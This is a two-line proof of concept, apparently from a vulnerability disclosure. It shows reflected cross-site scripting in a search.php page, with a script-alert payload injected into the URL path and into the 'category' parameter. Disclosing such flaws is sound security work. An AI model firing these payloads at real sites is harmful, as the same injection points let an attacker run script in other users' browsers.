http://www.example.com/path/search.php/"><script>alert(/Soot/)</script> http://www.example.com/path/search.php?category="><script>alert(/Soot/)</script>